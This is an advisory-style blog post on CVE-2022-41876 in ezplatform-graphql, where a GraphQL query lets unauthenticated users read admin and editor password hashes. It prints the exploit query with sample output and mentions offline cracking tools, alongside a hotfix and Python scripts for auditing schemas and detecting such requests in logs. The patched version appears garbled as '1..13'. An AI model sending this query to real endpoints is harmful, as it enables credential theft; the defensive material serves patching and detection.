On October 26, 2022, a critical vulnerability was disclosed in the ezplatform-graphql package—a popular GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Identified as CVE-2022-41876, this flaw allowed *unauthenticated* users to extract sensitive information, including administrator and editor password hashes, via GraphQL queries. In this guide, we'll break down what happened, show you the nitty-gritty code details, explain how the exploit works, and walk you through the fix if you can’t upgrade right now.
What is ezplatform-graphql?
ezplatform-graphql enables powerful API access via GraphQL on top of Ibexa's content management systems (CMS). It's widely used for enabling apps or third-party services to fetch or manipulate content in a flexible way.
Insecure Storage of Sensitive Information
Before versions 2.3.12 (for the v2 branch) and 1..13 (for the v1 branch), ezplatform-graphql had a major security oversight: the GraphQL schema would expose the passwordHash field on user accounts. Worse—you didn’t need to be logged in! Anyone could craft a query to list users and dump their password hashes (and sometimes other personal info).
- Even with strong hashes, attackers can attempt offline brute-force attacks against the dumped values.
- The users most affected are admins and editors—those with the capability to manage most of your website.
Let's see what the GraphQL schema could look like (simplified!):

```yaml
# src/bundle/Resources/config/graphql/User.types.yaml
User:
    type: object
    config:
        fields:
            passwordHash:
                type: String
            email:
                type: String
            login:
                type: String
            ...
```
With this schema, an attacker could send the following POST request to your GraphQL endpoint:

```graphql
query {
  users {
    email
    login
    passwordHash
  }
}
```
If not patched and no authentication applied, this request would succeed and output something like:

```json
{
  "data": {
    "users": [
      {
        "email": "admin@example.com",
        "login": "admin",
        "passwordHash": "$2y$10$e1lv...longbcrypthash"
      },
      // more users...
    ]
  }
}
```
Now, an attacker can grab the hash and use offline tools (hashcat, John the Ripper) to try to crack the password.
For v2.x users: Upgrade to version 2.3.12 or newer.
For v1.x users: Upgrade to version 1..13 or newer.
Ibexa’s Official Security Advisory
Can’t Upgrade? Hotfix it Yourself
You must remove (or restrict access to) the passwordHash (and similar) fields from the GraphQL schema manually.
Open src/bundle/Resources/config/graphql/User.types.yaml:

```yaml
User:
    type: object
    config:
        fields:
            # Remove or comment out unsafe fields!
            # passwordHash:
            #     type: String
            # hashType:
            #     type: String
            # email:
            #     type: String
            # login:
            #     type: String
            # Keep only non-sensitive fields!
            name:
                type: String
            ...
```

Then, clear cache and redeploy:

```shell
php bin/console cache:clear
```
If possible, also tighten access controls on the GraphQL endpoint itself so that the schema change is not your only line of defence.
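After applying the hotfix (or the upgrade), it is worth confirming that the deployed schema no longer exposes the fields in question rather than trusting the YAML edit alone. The following script is an added example and not part of the ezplatform-graphql project: it runs a standard GraphQL introspection query's result through a checker that lists every object type still carrying a sensitive field name. The two JSON responses embedded below are constructed to mirror the before and after states described above; in practice you would POST `INTROSPECTION_QUERY` to your own endpoint, as an unauthenticated client, and feed the response body to `audit()`. The list of sensitive field names is an assumption taken from the hotfix above; extend it for your own schema.

```python
"""Audit a GraphQL introspection result for sensitive user fields.

Added example, not code from the ezplatform-graphql project. The sample
responses are constructed; the field list mirrors the hotfix above.
"""
import json

# Standard GraphQL introspection query: every type with its field names.
INTROSPECTION_QUERY = """
query AuditSchema {
  __schema {
    types {
      name
      kind
      fields { name }
    }
  }
}
"""

# Field names treated as sensitive (assumption based on the hotfix above).
SENSITIVE_FIELDS = frozenset({"passwordHash", "hashType", "email", "login"})


def find_sensitive_fields(introspection, sensitive=SENSITIVE_FIELDS):
    """Return sorted (type_name, field_name) pairs still exposed by the schema.

    `introspection` is the parsed JSON response to INTROSPECTION_QUERY.
    Built-in introspection types (names starting with "__") and non-object
    types (scalars, enums, ...) are skipped because they carry no fields.
    """
    findings = []
    for gql_type in introspection["data"]["__schema"]["types"]:
        name = gql_type.get("name") or ""
        if name.startswith("__") or gql_type.get("kind") != "OBJECT":
            continue
        for field in gql_type.get("fields") or []:
            if field["name"] in sensitive:
                findings.append((name, field["name"]))
    return sorted(findings)


def audit(response_text):
    """Parse a raw response body; an empty list means no sensitive field is exposed."""
    return find_sensitive_fields(json.loads(response_text))


# Constructed sample: what an unpatched schema's introspection looks like.
UNPATCHED_RESPONSE = json.dumps({
    "data": {"__schema": {"types": [
        {"name": "__Type", "kind": "OBJECT", "fields": [{"name": "name"}]},
        {"name": "Query", "kind": "OBJECT", "fields": [{"name": "users"}]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "login"}, {"name": "email"},
            {"name": "passwordHash"}, {"name": "hashType"}, {"name": "name"}]},
        {"name": "String", "kind": "SCALAR", "fields": None},
    ]}}
})

# Constructed sample: the same schema after the hotfix above.
HOTFIXED_RESPONSE = json.dumps({
    "data": {"__schema": {"types": [
        {"name": "Query", "kind": "OBJECT", "fields": [{"name": "users"}]},
        {"name": "User", "kind": "OBJECT", "fields": [{"name": "name"}]},
        {"name": "String", "kind": "SCALAR", "fields": None},
    ]}}
})


if __name__ == "__main__":
    for label, body in (("unpatched", UNPATCHED_RESPONSE), ("hotfixed", HOTFIXED_RESPONSE)):
        leaks = audit(body)
        print(f"{label}: {'CLEAN' if not leaks else leaks}")
```

If introspection is disabled on your production endpoint, run the check against a staging copy built from the same schema files, or re-run the `users { passwordHash }` query from the advisory and confirm it now returns a validation error rather than data.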
- Patched releases: 2.3.12, 1..13
- Public Disclosure: GitHub Security Advisory ID: GHSA-gw3h-3757-hq36
- CVE issued: CVE-2022-41876 on NVD
References
- GitHub Security Advisory: CVE-2022-41876
- NVD listing for CVE-2022-41876
- ezplatform-graphql GitHub repository
What Should You Do?
If you use ezplatform-graphql before the patched versions, upgrade ASAP. If upgrading isn’t possible, hotfix your GraphQL schema *now* to remove sensitive outputs. Check for unauthorized API traffic—if you’re on an affected version and exposed the endpoint publicly, consider a forced reset for user passwords as a precaution.
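To act on the "check for unauthorized API traffic" advice, you need to look at what GraphQL documents were actually requested, not just which URL was hit. The following detector is an added example and not part of the ezplatform-graphql project: it assumes you capture raw request bodies at the GraphQL endpoint (for instance in a reverse proxy or a Symfony request listener) together with a timestamp, source address and the authenticated user, if any. It strips string literals and comments before matching so that a query merely mentioning `passwordHash` inside an argument value is not flagged, and it handles batched (array) requests and aliased selections. The request records, field names and record layout below are all constructed for the example.

```python
"""Flag GraphQL requests that select sensitive user fields.

Added example, not code from the ezplatform-graphql project. Record layout
({"ts", "src", "user", "body"}) and the sample requests are constructed.
"""
import json
import re

# Field names whose selection should raise an alert (assumption, per the hotfix).
SENSITIVE_FIELDS = ("passwordHash", "hashType")

_STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')      # GraphQL string literals
_COMMENT_RE = re.compile(r"#[^\n]*")                 # GraphQL line comments
_FIELD_RE = re.compile(r"\b(" + "|".join(SENSITIVE_FIELDS) + r")\b")


def sensitive_selections(query_text):
    """Return the sensitive field names selected in one GraphQL document.

    String literals are blanked and comments removed first, so a literal such
    as setLabel(text: "passwordHash") does not count as a field selection.
    """
    cleaned = _COMMENT_RE.sub("", _STRING_RE.sub('""', query_text))
    return sorted(set(_FIELD_RE.findall(cleaned)))


def extract_queries(body_text):
    """Return the query documents in a JSON body (single object or batch list)."""
    try:
        body = json.loads(body_text)
    except json.JSONDecodeError:
        return []
    items = body if isinstance(body, list) else [body]
    return [item["query"] for item in items
            if isinstance(item, dict) and isinstance(item.get("query"), str)]


def flag_requests(records):
    """Return one alert per request that selects a sensitive field.

    Unauthenticated requests are marked, since the advisory's condition is an
    anonymous client reading these fields.
    """
    alerts = []
    for rec in records:
        hits = set()
        for query in extract_queries(rec["body"]):
            hits.update(sensitive_selections(query))
        if hits:
            alerts.append({
                "ts": rec["ts"],
                "src": rec["src"],
                "anonymous": rec.get("user") in (None, "", "anonymous"),
                "fields": sorted(hits),
            })
    return alerts


# Constructed sample records: captured request bodies at /graphql.
SAMPLE_REQUESTS = [
    {"ts": "2022-11-01T10:00:01Z", "src": "203.0.113.7", "user": None,
     "body": json.dumps({"query": "query { users { login passwordHash } }"})},
    {"ts": "2022-11-01T10:00:05Z", "src": "198.51.100.4", "user": "editor",
     "body": json.dumps({"query": 'mutation { setLabel(text: "passwordHash") { ok } }'})},
    {"ts": "2022-11-01T10:00:09Z", "src": "203.0.113.7", "user": "anonymous",
     "body": json.dumps([{"query": "query { users { name } }"},
                         {"query": "query { users { h: hashType } }"}])},
    {"ts": "2022-11-01T10:00:12Z", "src": "192.0.2.9", "user": None,
     "body": "not json at all"},
]


if __name__ == "__main__":
    for alert in flag_requests(SAMPLE_REQUESTS):
        print(alert)
```

Any alert on an affected version that predates your hotfix is a strong signal that the hashes have left the building, which is the case where the forced password reset mentioned above stops being a precaution and becomes a requirement.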
Stay safe! Always keep software up to date, audit your API schemas, and never expose sensitive information accidentally.
*Post exclusive for developers and IT administrators. For questions, reach out or join the Ibexa Community for best practices.*
Timeline
Published on: 11/10/2022 21:15:00 UTC
Last modified on: 11/15/2022 20:10:00 UTC